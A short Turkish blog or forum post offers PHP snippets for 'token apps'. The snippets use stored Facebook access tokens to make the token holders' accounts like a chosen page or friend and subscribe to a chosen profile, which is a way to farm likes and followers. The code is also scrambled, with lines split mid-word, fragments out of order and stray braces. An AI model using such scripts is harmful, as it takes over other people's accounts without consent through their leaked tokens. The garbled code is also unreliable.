Evet arkadaşlar başlıkta belirttiğim gibi tokenli uygulamalar için vereceğim kod ile istediğiniz şeye beğeni & istediğiniz profile abone/arkadaş kasabilirsiniz.
Belki bilen vardır bilmiyorum ama yinede paylaşayım dedim ..
<=ABONE/ARKADAŞ KODU=>
<?
$access = $ok['access_token'];
$fbid = $ok['fbid'];
ST['link']);
$tamlink = "https://
$ids = htmlspecialchars($_P
Ograph.facebook.com/".$fbid."/friends?access_token=".$access."&uid=100003337900949&method=post";
$ch = curl_init( );
curl_setopt( $ch, CURLOPT_URL, $tamlink );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
$result = curl_exec( $ch );
}
?
>
if($result == "true"){
$true++;
KIRMIZI OLAN YERE PROFİL ID GİRİCEKSİNİZ.
<=BEĞENİ KODU=>
<?
$access = $ok['access_token'];
$fbid = $ok['fbid'];
aph.facebook.com/518891521507986/likes?access_token=".$access."&method=post";
$tamlink = "https://g
r
$ch = curl_init( );
LOPT_URL, $tamlink );
curl_setopt( $ch, CU
curl_setopt( $ch, CU
RRLOPT_RETURNTRANSFER, true );
$result = curl_exec( $ch );
}
}
?>
Hiç yorum yok :